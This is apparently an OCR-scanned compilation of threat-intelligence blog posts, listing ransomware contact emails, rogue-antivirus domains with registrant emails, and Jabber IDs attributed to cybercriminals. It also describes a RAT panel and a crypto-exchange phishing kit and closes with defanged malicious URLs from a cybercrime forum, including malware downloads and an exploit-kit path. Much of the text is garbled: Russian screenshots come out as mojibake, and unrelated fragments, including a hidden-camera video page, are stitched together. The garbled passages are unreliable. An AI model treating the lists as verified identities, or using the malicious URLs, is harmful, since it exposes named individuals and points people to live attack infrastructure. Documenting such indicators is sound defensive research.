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bebenrowan@aol.com 
gonald58@cock.li 
recoverydata52@protonmail.com 
delta@onionmail.org 
GruzinRussian@aol.com 
Decipher@keemail.me 
Salesrestoresoftware@firemail.cc 
Mailrepa.lotos@aol.com 
Space _rangers@aol.com 
Salesrestoresoftware@gmail.com 
amagnus@india.com 
Decryptallfiles@india.com 
Tessa88@exploit.im 
answer@pcworld.com 
Wisperado@india.com 
Decryptallfiles3@india.com 
Orgasm@india.com 
Ncrypt@cock.li 
Love.server@mail.ru 
Bitcoinrush@imail.com 
Batman _good@aol.com 
Ninja _gaiver@aol.com 

Help _you@india.com 
Radxlove7@india.com 
slaker@india.com 
Suppteam03@india.com 
safeanonym14@sigaint.org 
Matrix9643@yahoo.com 
Restore@protonmail.ch 
Hairullah@inbox.|v 
Calipso.god@aol.com 
avastvirusinfo@yandex.com 
Lavandos@dr.com 
Mich78@usa.com 

Mk _cyrox@aol.com 
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License error! 


Spyware found 


Protection disabled 


t 
= Privacy violation 


Registry error 


Database update error! 


Security under threat! 


goscantoil. com - Email: jowimpee@gmail.com 
goscantrio. com - Email: crschuma@gmail.com 
goscanxtra. com - Email: crschuma@gmail.com 
gosolescan. com - Email: geofishe@gmail.com 
gotoilscan. com - Email: jowimpee@gmail.com 
gotrioscan. com - Email: momorule@gmail.com 
gowellscan. com - Email: stinfins@gmail.com 
goxtrascan. com - Email: momorule@gmail.com 
iantiviruspro .com - Email: broderma@gmail.com 
iantivirus-pro .com - Email: feetecho@gmail.com 
ia-pro .com - Email: abuse@domaincp.net.cn 
iav-pro .com - Email: mcgettel@gmail.com 

in5ch .com - Email: getoony@gmail.com 

in5cs .com - Email: getoony@gmail.com 

in5ct .com - Email: phounkey@gmail.com 

in5id .com - Email: getoony@gmail.com 

in5it .com - Email: phounkey@gmail.com 

in5iv .com - Email: phounkey@gmail.com 

in5st .com - Email: getoony@gmail.com 

inavpro .com - Email: thdunnag@gmail.com 
scanatom6 .com - Email: sckimbro@gmail.com 
windoptimizer .com - Email: wousking@gmail.com 
wopayment .com - Email: broderma@gmail.com 
woptimizer .com - Email: broderma@gmail.com 
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Makedonskiy@gmx.com 
fantomd12@yandex.ru 
Melme@india.com 
ihurricane@sigaint.org 
Diablo diablo2@aol.com 


Makdonalds@india.com 


ViadimirScherbinin1991@gmail.com 


mkgoro@india.com 
Okean-1955@india.com 
rescuers@india.com 
Masterlock@india.com 
garryweber@protonmail.ch 
Milarepa.lotos@aol.com 
Cocoslim98@gmail.com 

Last centurion@aol.com 
samanta@scryptmail.com 
Savepanda@india.com 
Bnd54@mail2tor.com 
Happydayz@india.com 
Meldonii@india.com 
Catsexy@protonmail.com 
Sitaram108@india.com 
bonum _malum@aol.com.onion 
anony.killers@protonmail.com 
Deccripted@gmail.com 
Payfornature@india.com 
Drugvokrug727@india.com 
Helpme@freespeechmail.org 
Ceril33@india.com 
Agella@scryptmail.com 

Age _empires@india.com 
unlckr@protonmail.com 
Supportfriend@india.com 
Santa _helper@protonmail.com 


A _Princ@aol.com 
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Nomoneynohoney@india.com 
Sos@anointernet.com 
Fud@india.com 
Suppteam01@india.com 
Bitcoinpay@india.com 
hnumkhotep@india.com 
webmafia@asia.com 
haizenberg@aol.com 
Supermagnet@india.com 
Systemdown@india.com 
Raa-consultl1@keemail.me 
Opencode@india.com 
Apple.pass@mail.com 
black.world@tuta.io 
DIGITALKEY@163.com 
Thedon78@mail.com 
Applehelp@caramail.com 
Gerkaman@aol.com 
Siddhiup2@india.com 
SharkO1@msgden.com 
Help@decryptservice.info 
Doctor@freelinuxmail.org 
wyna@nyu.edu 

Cyber baba2@aol.com 
Xbotcode@gmail.com 
assistant@bitmessage.ch 
Grapn206@india.com 
Guardware@india.com 
Decryptutility@protonmail.com 
fixfiles@protonmail.ch 
Ramachandra7@india.com 
File-help@india.com 
Recuperadados@protonmail.com 
helpmeonce@mail.ru 
Payransom@qq.com 
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GuardBTC@cock.|i 
jonskuper578@india.com 
Decrypthelp@qq.com 
MildredRLewis@teleworm.us 
Alex.vilasov@aol.com 

Grand _car@aol.com 
systems@tutanota.com 
Seven _legion@aol.com 
waiting@bitmessage.ch 
szem@tutanota.com 
Legioner_seven@aol.com 
Peekabooo@qq.com 

help _911 support@rambler.ru 
help@tutanota.com 
Szems@tutanota.com 
Tizer78224@india.com 
Tizer77234@protonmail.com 
recfiles@protonmail.com 
Patagonoa92@tutanota.com 
Worldcry@cock.li 

Support _wc@bitmessage.ch 
berr@keemail.me 
Hellstaff@india.com 
mr.dec@tutanota.com 
mr.dec@protonmail.com 
regem _regum@aol.com.onion 
gardengarden@cock.li 
JoniCarter@protonmail.com 
servicedeskpay@protonmail.com 
123@tutanota.com 
crab7765@gmx.de 
brbrcodes@gmail.com 
datastore2018@mail.ru 
f1220@tuta.io 


sebastiennolet92@gmail.com 
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bkp@cock.li 
email-iizomer@aol.com 
petropasevich@aol.com 
blacklist@clock.li 
Blacklist@cock.li 
Mammon-decrypt@protonmail.com 
Light Yagami@tuta.io 
backtonormal@foxmail.com 
nikolateslaproton@protonmail.com 
decoder-help@protonmail.com 
kurosaki ichigo@tutanota.com 
decryptgarranty@airmail.cc 
Pumarestore@india.com 
lolitahelp@cock.li 
wewillhelp@airmail.cc 
wayneevenson@protonmail.com 
Cyberwars@qq.com 
yoursalvations@protonmail.ch 
Grizzly@airmail.cc 
incongnitoman@protonmail.com 
InkognitoMan@tutamail.com 

x _mister@aol.com 
Funnybtc@airmail.cc 
QyavauZehyco1994@o2.pl 
Bestdecoding@cock.|i 
Usacode@aol.com 
BTCBREWERY@protonmail.com 
Decisivekey@tutanota.com 
traher@dr.com 
Pdfhelp@india.com 
jundmd@cock.li 
windat@protonmail.com 
Supportdecrypt@firemail.cc 
seed@firemail.cc 
NastasyaTurkina68@mail.ru 
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Merosa@india.com 
Mrpeterson@cock.li 
unlockdata@foxmail.com 
ht2707@email.vccs.edu 
callmegoat@protonmail.com 
Bitcharity@protonmail.com.com 
Vengisto@india.com 
F-data@protonmail.com 
audrey.b@aol.com 
Vengisto@india.co 
decryptxxx@protonmail.com 
Gerentoshelp@firemail.cc 
Mespinoza980@protonmail.com 
daves.smith@aol.com 
noreply@blogger.com 
Badfail@qq.com 
Cryptmanager@protonmail.com 
decryptxxx@protonmail.co 
daves.smith@aol.co 
Cryfixfoo@qq.com 
Merd@tutanota.com 
mirey@tutanota.com 
bitkick@protonmail.com 
crypto.support@aol.com 
keyforyou@tuta.io 
roomlahC@secmail.pro.cr 
3542516480@qq.com 
flower.harris@protonmail.com 
Recoverfile@protonmail.com 
helpersmasters@airmail.cc 
xzet@tutanota.com 
Cho.dambler@yandex.com 
Starbax@tutanota.com 
che808@protonmail.com 
Stay tuned! 


1. https: //blogger.googleusercontent .com/img/b/R29vVZ2x1/AVvXsEgJLjFOtgXO9AVXGPKwKzg032Mo0xqf 347EkrNGtc8BCP8i 
3VPrbWGNGmg2kDI7 1hRoer5qqAQ_oAsBDvMzSftyq0SGI2a0_2b3G6 
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19.8.7 A New Anarchy RAT (Remote Access Tool) Malicious Software Spotted in the 
Wild (2023-08-20 20:37) 


7 


©) ANARCHY PANEL 


An image is worth a thousand words - part two. 


I’ve recently came across to a newly released malicious software which basically allows 
novice and experienced users with the ability to launch and manage access to compromised 
corporate and home networks and PCs where the ultimate goal would be to do this as easy as 
possible. 


Sample screenshots include: 


[2] 
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© ANARCHY PANEL 


GR bert Maraoe 


: 


: : : : [ 


RECOVERY PASSWORD 
= 


ee. 
"S" CLIENTS 


(ANARCHY PANEL 


SOCTOLE GN 
Crest 


TT) 


[4] 
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ANARCHY HYNC ————, “mc @ 


ANARCHY HYNC 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEianU50ezFUVBIMsRmJgN1vXDxj4S5yt_R2Pzy8M9eUuCbE1 
N9-9_io0AqikTSoJ8EG2H5Hk1HuOBEKKH9FMRPhxXhs 12v_FEefJxjiL 
2. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEg2XV_N9vUaLKI 1Nm-BBM2eiFuywimK-Ysp5UaY_ZzdYycRw 
JJCbp81 jkhKMuXaEs JxgiuG1QnZe86m_NKuzjU1kCVgbVx01MsOmfA 
3. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEi3uRy10QB8F50Lg4DVQcOXby IUoRkJ_sBgPXyAB2krA_XGQ 
4Cdf j Oyk588N522 j0aAOZHdvDIjS4vp1jUe3hJMFQ1pRADzDXZrtsa 
4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEj 8B_smGB307UxQg1 juCP1QxpaF6FOLN8cynOauiWQCQOrc5 
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fayUZqeFHHM1V-RL7KOw8PADZBShp_sQ1H_OJwaldfGjf-eKURGExd 


5. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEit J6EGOqt40MVKOwkokHkDEsV5CoMy_OYQ11sW_mj6QvalH 
8MF yOFw8aDBx_e_ETXalDLekC6EWZPbjUNcGPsVARgzitVikdnSLif 


19.8.8 A DIY Cryptocurrency Exchange Phishing Kit Spotted in the Wild 
(2023-08-20 20:37) 


[1] 


Mowemy UMeHHO Mbi? C*** O6MeHHMK KPUNTOBAaNWT 


- kpoccGpaysepnmi / agantwenniA 
Anszaiin oGmennuKka Npeanaraem Teoemy BHYMAHMW OOMCHHHK C dyHKYMONANOM: 
~ BaNMAnbIA KOA OGecne4HBAeT 


BbICOKYIO CKOPOCTe Pabore SW Nogsasxa vepes aqmuuxy token u id tr 6oTa/rpynnu 


- nmpocran aQmen narneAn C na6opom 
weobxogumbx HaCcTpoeK =i foGaanenne / yaanerue mover (mo6o0e KonnuectBo) 
~ YCTAHOBKS Ha XOCTHHT SanMMaeT 
10 munyr —2 flobasnenne / sbiunTaHve NpoueHTa Kak Ha Bce 


- paGoraert kax Ha vds / vps Tak 4 Ha 2 o6meHbi, Tak 4 Ha OTAeNbHYO MOHETHYyW Napy 
xocTuure 


- 8 KOMNMeKTe C OGMEHHMKOM AaeM Bei6op min/max cymMbi Ha O6meH 
cxemy + Manyan 
Npomoxosopy c nogersKod id (ana BopKepos) 
* ChMCoK Bcex TpaHsaKuni + NOATBepxAeHHe B AQMMHKE 
OTnpaska scex peitenii c O6menHu«xa B Gor / rpynny 


2 a3bIka pyc / aHrn + MOACTpoliKa Nog A3bIK Gpay3epa 


= ] Painosan crpyxtypa cxoma c PremiumExchanger 


CeA3b C HAMM: 


te: 


CQERIATSCR C HaMM 


An image is worth a thousand words. 


I’ve recently came across to a DIY cryptocurrency exchange phishing kit where basically the 
vendor allows you to set up your own fake cryptocurrency exchange which could be later on 
used to trick and entice users into falling victim into this scam potentially affecting hundreds 
of thousands of gullible users thanks to the professional DIY templates managed and operated 
by the vendor. 


Sample screenshots include: 


[2] 
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= c- Necense ane eYE 


Cos3ganve 309BKH Ha O6MeH 
Dee COngirers Sommer 10 O6eneH, eETTOMHS IOMOMETTO None, nH Chey TO mec hpyepen VIOte 
awa O6seeH 
Ome 
Reneere Cynmey ma Orreeny 
% 
Ls el 
° 
he? 
® Camaie Guictpeie oGMeHm A 
[3] 
Zina co3qaHua 3098KK HA O6MeH, BHUMATeENbHO 3aNonHHTe NoNs, HW CNeAyiTe MHCTPyKUMH YTO6bI 
HOYaTb O6MEH 
Orga 
<p» BTC Baw email nu6o te 


Baw xowenek 


Baennre npomoxo, 


W me Cambie 6c" 
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cafropy .cn - Email: spscript@hotmail.com 
cakevy .cn - Email: spscript@hotmail.com 
dotqyuw .cn - Email: spscript@hotmail.com 
dovnaji .cn - Email: spscript@hotmail.com 
dovzyag .cn - Email: spscript@hotmail.com 
dozabes .cn - Email: spscript@hotmail.com 
ducygqan .cn - Email: spscript@hotmail.com 
duvaba .cn - Email: spscript@hotmail.com 
duvegy .cn - Email: spscript@hotmail.com 
duwbiec .cn - Email: spscript@hotmail.com 
duxsoez .cn - Email: spscript@hotmail.com 
duzebyn .cn - Email: spscript@hotmail.com 
dybapi .cn - Email: spscript@hotmail.com 
dyqkuam .cn - Email: spscript@hotmail.com 
dyqunre .cn - Email: spscript@hotmail.com 
dytrevu .cn - Email: spscript@hotmail.com 
dyzani .cn - Email: spscript@hotmail.com 
ebaetu .cn - Email: spscript@hotmail.com 
ebeoxuw .cn - Email: spscript@hotmail.com 
ebeozag .cn - Email: spscript@hotmail.com 
edogeg .cn - Email: spscript@hotmail.com 
epuneyv .cn - Email: spscript@hotmail.com 
epuvyiz .cn - Email: spscript@hotmail.com 
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Creating an exchange request 
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rr AML/KYC 
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O6meHnBan KPMNTOBGNIOTy 6bICTPO K 
no nyuwemy Kkypcy 
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Exchange cryptocurrency safely wallet name 
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clean exchange Onsc Abe PCT Neseana 


- HOZ@XKHbIA OGMEH SNEKTPOHHbIX 
nenHer, 6bicTpo uw no nyuwemy Kypcy 


Gir-three.premniumexchange link ~ surogHadh COPENe NO COMOHY GONKUMHCTES ENROL BAMOT. BOM HOOGEORYMO BUS DOTS HONPORNOHHA ANE COMOHC 
JONORHHTS DOKEAIT, ROMRHORUIMG ROACTEHE NDOMCXORET 6 OBTOMITHYOCKOM PeaMe, NPOKTAOCEN MMOBOHHO, MonHaE COePOUNE NO OtmOHYy B 
CPeQHoM seanoniReTca OT S QO 1S MuMyT, We SUBMICHMO OT BpeMeHH CyTOR Perncrpauwa Me Theéyerce 


= bas 2 Ofseen 187C ~ 1452022 ETH 
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ome ° ° 


Cae eee 
QO vnc QO wm 
Ten 
[Lt] 
clean exchange About ut AMY Tem 
is a reliable currency and electronic 
money 


cir-three.premiumexchange link is a proftable service for exchanging most types of currencies. You need to choose the directions for the exchange 
ond fil in the details, further actions ore automatic, almost instontly. A complete exchange operation runs on average trom 5 to 15 minutes, 


regordiess of the time of day. Registration no required 


Youserd ‘You get co Exchange 16TC - 1432013 ETH 
Sear com Search com 
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<2 Gacherge 18TC- 1492013 8TH 


Changing BTC Tortw 
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(2? KacromHbie MoHeTeI [77 
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Bo6basuts HoByW napy 
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Olo6asuTb HOBbIN KoweNneK 


Coin - Ha3BaHve MOHeTbI B hopmatTe "ATOM" 


BHUMaTeNbHO 3anonHn sTo none! HanpuUMmep - ANA 


6UTKOMNHA HYKHO HanucaTb BTC, ana s@upuyma ETH 


Uma MOHeTbI OTO6paKaemMoe Ha CTpaHuiiax "COSMOS" 


Ha oTNpaBky & Ha nonyyeHnve & 
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© DosaenrTe npouenr BB Bevecr npouenr 


Murmmanbean cym™ma (8 fonnapax) 


200 


MaxchmanbHas cyméa (6 Ronnapax) 


500000 


Token Ti Gora 


Chat id TT rpynnn 
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DoGaavte Hoeuh mpomonoca 


Stay tuned! 
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17. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVVXsEiEFkelmvNSNEKqtE05f£ vz21Uybv97PbgN8LMZQipBNoMe 
ne2eo0FKc8xvTqOUb7DE_ticajOs_sBJ8nGVOZ1BzAHu80dg1j9_ JW: 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEi JOBzY9zus5Vi_KJUdqZYkrtXgA-Di6acHxn7mQ3US-RQ 
- J6vY8DVxESS3ukK pUUfRSDOBdWcrAIE7iS45WPUF cI JdJe7uQHsta 
ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEjQXIawSCZ151iQWslgS7dQJIG61h5JJ59_F5xBhssInQz 
sddiqbp6ya_pIqGj5R3Qg0Zx0Gd3wICgf lveAbQKxVU2VCqM- DMF cVW 
ttps://blogger. googleusercontent. com/img/b/R29VZ2x1/AVvXsEhqhs7rnhYNEFFXB58DMIHA1TO5BUxaile_VXQZyx2MU-ua 
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19.8.9 Exposing a Currently Active Personally Identifiable Cybercriminals 
XMPP/Jabber Account IDs Portfolio - Part Two (2023-08-20 20:38) 


[1] 
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Yougitits — Satin 
ia 


cme Videos Channels Subscriptions Hisery | Upload | 
Sexy Hidden Camera @e 


T?Torot 
es : _Saoncroe 
ADOGE™ FLASH" PLAYER Ln 


> More From: 7770robi 
+ Related Videos 


“a 
Ja ft Peet 7 wen Puget 
TaDkACOM 
+ wrerawet? 
Feawes Vee 


Haden camera. rebel 
freresart 


Sunbed babe, Hidden 
camera. 


stone 


aKeKK? 482.245 wews 
skrita kamera 
Favorme Share Playlists Flag 


= % 
B a7 
Sarrvens Karnera sticly 
> Statistics & Dots ; eo Rcserce 
— + 16 
Video Responses : tt a Video Reaperse if 
— if 
+ a 


* >) Hidden camera. big dick 
Y Text Comments hone 


jocdanonest ay ot 
Sexy Maden Camera Bath 
Prem ©C4) a 


eqadozu .cn - Email: spscript@hotmail.com 
eqaofed .cn - Email: spscript@hotmail.com 
eqaone .cn - Email: spscript@hotmail.com 
eqayweh .cn - Email: spscript@hotmail.com 
eqibuym .cn - Email: spscript@hotmail.com 
eqidax .cn - Email: spscript@hotmail.com 
eqiovak .cn - Email: spscript@hotmail.com 
eqoabce .cn - Email: spscript@hotmail.com 
eqoumiv .cn - Email: spscript@hotmail.com 
erauso .cn - Email: spscript@hotmail.com 
ereugba .cn - Email: spscript@hotmail.com 
erujale .cn - Email: spscript@hotmail.com 
eruqav .cn - Email: spscript@hotmail.com 
esuteyb .cn - Email: spscript@hotmail.com 
etuacwo .cn - Email: spscript@hotmail.com 
etuexyp .cn - Email: spscript@hotmail.com 
etyawjo .cn - Email: spscript@hotmail.com 
etykauw .cn - Email: spscript@hotmail.com 
evaolux .cn - Email: spscript@hotmail.com 
evaopsu .cn - Email: spscript@hotmail.com 
keturma .cn - Email: spscript@hotmail.com 
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<parent> Darkmoney 


11Wang DarkWeb 
365Exe DomenForum 
419eater Eviloctal 
4HatDay Exelab 


aHack Forum-UINSell 

Aljyyosh Forum.Zloy.bz 
Antichat.ru ForumSape 
ArmadaBoard ForumSEO 


BigFozzy Free-hack 
BlackhatWorld ghostmarket.net 
BPCForum Gla.vn 
Cardvilla GoFuckBiz 
Chf gofuckbiz.com 
CNHonker H4kurd.com 
CNSec Hack-Port 
Crack-Forum Hackersoft 
Cracked.to Hackingboard 
Cyberizm Hackings 
Darkmarket.la iFud 


iHonker 
LinkFeed 
Linuxac.org 
Master-X 
MasterWebs 
MaulTalk 
Mmpg.ru 


Mr11-11mr.7olm.org 


Nullnoss.org 


pay-per-install_org 


PhreakerPro 


Piratebuhta.pw 


ProCrd 
ProLogic 
Promarket 
ProxyBase 


scamwarners 


SEOCafe 
SEOForum 


ShadowMarket 
SkyFraud 
Spyhackerz 
Svuit.vn 
Szenebox 
Szuwi 
Tenebris 
TheBot 
Toolbabase.se 
TotalBlackhat 
Turkhackteam 
Vsehobby 
Webmasters.ru 
Whitehat.vn 
WW/H-Club 
www.opensc.ws 
Xakep.bg 
Xakepok 
Zismo 


This is the second part of recently obtained personally identifiable XMPP/Jabber account IDs 
known to belong to known and confirmed cybercriminals. 


Happy research. 


Sample personally identifiable cybercriminals XMPP/Jabber account IDs include: 


1008200@jabber.ru 

9@jabber.ru 

android1@jabber.se 
dumpscc@jabber.ru 
jabber@jabber.com 

lawton supp en@public-jabber.me 
lawton supp _ru@public-jabber.me 
nik7kin@jabber.ru 

nlawton supp _en@public-jabber.me 
nlawton supp _ru@public-jabber.me 
vicenzo@jabber.cz 
bestdump@xmpp.jp 
biceps@xmpp.jp 
blackmambba@xmpp.jp 
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bosherz@xmpp.jp 
cc-street@xmpp.jp 
flavour44@xmpp.jp 
m-ickey@xmpp.jp 
ssn24@xmpp.jp 
Cardmafia@exploit.im 
Ego@creep.im 
cardvilla@exploit.im 
chesterchitos@exploit.im 
cybernato@exploit.im 
demsocks@exploit.im 
demsupport@exploit.im 
dev.tenebris@exploit.im 
dumpstv@exploit.im 
ideal _docs@exploit.im 
magicbot@exploit.im 
numerik53@jabb.im 
oliviam@creep.im 
procrd@exploit.im 
rothschildgroup@exploit.im 
rumarket@exploit.im 
sales.linkensphere@exploit.im 
workforbtc@jabb.im 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEj u2QxZnNWPde-ihVbXwrep9YhFNp4WvzKTX3gLP_KYa01S4 
eOfFULsTz02cuFxf124f7x_mi6Kq7_JZTeuMaScMF JqgYdRvOIt7Rge 


19.8.10 Bed Time Reading Courtesy of the Bad Guys (2023-08-21 03:39) 
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<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy_bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install_org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WW/H-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


In need or a fresh set of URLs to check in your spare time courtesy of the bad guys’ "bed time" 
reading department? 


Check out my recent compilation which basically consists of all the URLs found on a popular 
invite only cybercrime-friendly forum community and happy reading and improving your situa- 
tional awareness in the field in terms of what are the bad guys up to in terms of improving their 
situational awareness in the field and what are they up to in terms of what are they working 
on. 


Sample URLs include: 

hxxp:// # # # # # #.conceptcar.ee/maybach/exelero/index.html 
hxxp://0.0.0.0:8080/irJaH9rEib2 
hxxp://002.kiev.ua/pictures/canon-eos-40d-kit-17-85 b.jpg 


hxxp://Oday.altive.info/gourl.php?hxxp://rapidshare.de/files/25290900/MIRKO CRO COP FIL- 
IPOVIC_VS SHUNGO _OYAMA _by _Odin.av 


hxxp://Oday.altive.info/gourl.php?hxxp://rapidshare.de/files/25317660/MARK _COLEMAN VS _ 
_MIRKO CRO _COP FILIPOVIC by Odin.a 


hxxp://Oday.altive.info/gourl.php?hxxp://rapidshare.de/files/33499747/Mirko _CroCop __Fil- 
ipovic_vs Bob Sapp _K-1 World GP _2003 in Saitama _by Odin.avi 


hxxp://12.150.231.6/binlist1l.rar 
hxxp://127.0.0.1/index.php?option=com _mediaalert &id= 
hxxp://127.0.0.1/index.php?option=com _pressrelease &id= 
hxxp://127.0.0.1/index.php?option=com _speech &id= 
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hxxp://188.64.203.242/login.asp 
hxxp://192.168.0.1/userRpmNatDebugRpm26525557/start _art 
hxxp://192.168.0.1/userRpmNatDebugRpm2652555/7/start _art.html 
hxxp://192.168.1.1:2048/etc/linuxigd/gatedesc.xml 
hxxp://192.168.1.1:5986/wsman/ &it 
hxxp://192.168.1.130:8080/irJaH9rEib2 
hxxp://192.168.1.254/upnp/control/igd/wanpppclinternet 
hxxp://192.168.254.100:20738/RPC2 
hxxp://193.219.5.194//index.php?showtopic=11011 &hl= 
hxxp://194.150.219.139/console/login.asp 
hxxp://194.28.172.249/squirrelmail/mill.pdf 

hxxp://195.5.138.171 

hxxp://l1mdc.com/ 
hxxp://203.26.19.30/proxy/nph-proxy.pl/111110A/http/www.google.de/ 
hxxp://206.161.120.40/ myfiles/design/ 


hxxp://207.46.196.114/WindowsServer/en/library/1db49727-f587-424d-8d98-bb51 
630d13a01033.mspx?mfr=true 


hxxp://208.66.194.231:3081/Idr/vn.cgi 
hxxp://208.72.173.10:3571/login.cgi 
hxxp://208.72.173.10:3571/man.cgi 
hxxp://209.160.72.125/babka.wmv 
hxxp://209.160.72.125/friday vs monday.wmv 
hxxp://210.82.91.1 
hxxp://211.172.232.126/index.html 
hxxp://212.14.170.85 
hxxp://212.199.41.148/Templates/Admin/login.aspx 
hxxp://212.199.70.171/login.php 
hxxp://212.235.109.200 

hxxp://212.235.68.46/login 
hxxp://217.15.132.114/Keys50.rar 
hxxp://21vek.ru/web/notebook.jsp?ser=4203 
hxxp://21vek.ru/web/notebook.jsp?ser=7380 
hxxp://3.141592653589793238462643383279502...0974944592.com/ 


hxxp://3.14159265358979323846264338327950288419716939937510582097494 
4592.com/ 
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hxxp://3.bp.blogspot.com/ _teq8tr511YQ/SFcruViY —_nl/AAAAAAAAAJU/IE6NoODcIUE/s1600- 
h/av _industry.gif 


hxxp://3mp3.ru/ru/album/12824/Freestyle-2-Rifmomanija 
hxxp://3mp3.ru/ru/aloum/12849/Virus-Trehmernye-Rifmy 
hxxp://3mp3.ru/ru/alobum/13927/Best-Istorija-O-Tom-Kak-Nachina-Ucenka-99 
hxxp://3mp3.ru/ru/album/26391/1000-Tysjachi-Bezymjannyj 
hxxp://3mp3.ru/ru/album/2987 1/Autro-Russkij-Re-p-v-tylu-vraga 
hxxp://3mp3.ru/ru/album/4355/Barhatnaja-pyl-Gromche-Vody-Vyshe-Travy 
hxxp://3mp3.ru/ru/artist/32900/Ligalajz 

hxxp://3proxy.ru/ 

hxxp://4jobs.com/emp/login/form/loginform.asp 

hxxp://4pda.ru/forum 

hxxp://4room.surgut.info/pictures/goez/tuma/ 
hxxp://5tv.com.ua/img/forall/no _comments/mp3/aresht _gorojenko.mp3 
hxxp://62.231.20.72:7778/fmsservice/passportpermit/index.jsp 
hxxp://64.67.192.186/down.html 
hxxp://65.75.191.180:21331/ndcr/ndcup131.exe 
hxxp://65.75.191.30/bankomat.zip 
hxxp://65.75.191.30/images/avtovan.jpg 
hxxp://66.175.12.254/cgiproxy/nph-proxy.pl/111110A/http/www.google.de/ 
hxxp://66.235.184.239/i.jpg 

hxxp://66.36.250.190/kiosk/ 
hxxp://67.18.131.22/rus/news/2006/03/28/sovest 

hxxp://72.232.177.34/ xinco/audil.jpg 

hxxp://72.232.177.34/ xinco/Scammers.3gp 

hxxp://72.232.177.34/ xinco/Scammers.mp3 

hxxp://72.232.92.130/baretti ni1.txt 

hxxp://726hbkwisbkdjivb.onion/ 

hxxp://77.127.51.131/admingui/login.htm! 

hxxp://7days.belta.by/7days _plus.nsf/(All)/2209BD806ACE867C422573E70 O4F60CA/ 


hxxp://7days.belta.by/7days _plus.nsf/All/2209BD806ACE867C422573E7004 - 
FEOCA?OpenDocument 


hxxp://7search.com/advertisers/ 
hxxp://80.250.154.152/login.asp 
hxxp://81.177.10.56/host/humor/8b/b _h7819.jpg 
hxxp://81.218.96.38/login 
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hxxp://81.95.150.42/MPack091cbt/index.php 
hxxp://89.248.171.30/MtGox2014Leak.zip 
hxxp://a86x.homeunix.org:8080/ts/in.cgi?open2 
hxxp://abibas.ru/mp3/abibas - shmara_moya.mp3 
hxxp://abomb.nm.ru/ded/ded.mp3 
hxxp://addons.miranda-im.org/details.php?action=viewfile &amp 
hxxp://adeona.cs.washington.edu/ 
hxxp://adiakov.free.fr/files/video/ukrtv/ukrtv. avi 
hxxp://agressor.cc/downloads/dlls.zip 
hxxp://agressor.cc/downloads/ebaychecker.exe 
hxxp://agressor.cc/downloads/ebaychecker _fb.exe 
hxxp://agressor.cc/downloads/ebaychecker setup.exe 
hxxp://agressor.cc/downloads/pkarda.exe 
hxxp://agressor.cc/downloads/vpnguard.exe 
hxxp://agressor.cc/images/main _screen.jpg 
hxxp://agressor.cc/images/main screen _small.jpg 
hxxp://agressor.cc/images/settings _import.jpg 
hxxp://agressor.cc/images/settings import small.jpg 
hxxp://agressor.cc/images/settings _main.jpg 
hxxp://agressor.cc/images/settings main _small.jpg 
hxxp://agressor.cc/vpnguard.jpg 
hxxp://ahom.ru/images/buratino. gif 
hxxp://ai.pricegrabber.com/pi/4/80/81/48081056 125.jpg 
hxxp://airnz.co.nz/ 

hxxp://akb2.narod.ru 

hxxp://akef-bank.ru 

hxxp://aktivbank.ru 
hxxp://alexwild.ru/uploads/pricols/dtp.jpg 
hxxp://alfa.altnet.ru/sk/mail/index.htm 
hxxp://al-jinan.net/ntarg.php 
hxxp://al-jinan.net/tlog.php?logn= &lt 
hxxp://al-jinan.net/tnewu.php?niogn= &lt 
hxxp://allchange.biz/index.php?page=visa _ virtual 
hxxp://allmedia.ru/headlineitem.asp?id=392423 
hxxp://alltheweb.com/search?cat=img &amp 
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hxxp://all-things.nnm.ru/cherez _tri_goda_bolshinstvo _nashih _oligarhov _razor 
hxxp://alltooflat.com/geeky/elgoog/ 

hxxp://aluigi.altervista.org/ 
hxxp://american.redcross.org/site/PageServer?pagename=ntlid main &amp 


hxxp://americanka.mindmix.ru/216-886-jeto-budet-interesno-tem-komu-seichas-20-2 
let.zhtml 


hxxp://amerimerchant.net/ 
hxxp://androidsecuritytest.com/features/logs-and-services/loggers/carrieriq/ 
hxxp://andrq.org/index.php?categoryid=9 &amp 
hxxp://anekdotov.net/pic/illusion/treugolnik-mini.gif 
hxxp://anndrew.land.ru/tristram _izvinaetsa.avi 

hxxp://anonsurf.de/ 

hxxp://anonymouse.ws/cgi-bin/anon-www _de.cgi/hxxp://www.google.de/ 
hxxp://anti-bm.ru/ 

hxxp://antifraudrussia.ru/ 

hxxp://anti-space.narod.ru/freeware.htm 
hxxp://anuario.narod.ru/affiliate. gif 

hxxp://anuario.narod.ru/b007.jpg 

hxxp://anyproxy.net/ 
hxxp://ap.proglab.ws/dpScreen/ADMINcp.edit.fields.JPG 
hxxp://ap.proglab.ws/dpScreen/ADMINcp.moder.JPG 
hxxp://ap.proglab.ws/dpScreen/ADMINcp.newmsg.JPG 
hxxp://ap.proglab.ws/dpScreen/ADMINcp.newwrk.JPG 
hxxp://ap.proglab.ws/dpScreen/ADMINcp.security.jpg 
hxxp://ap.proglab.ws/dpScreen/ADMINcp.users.jpg 
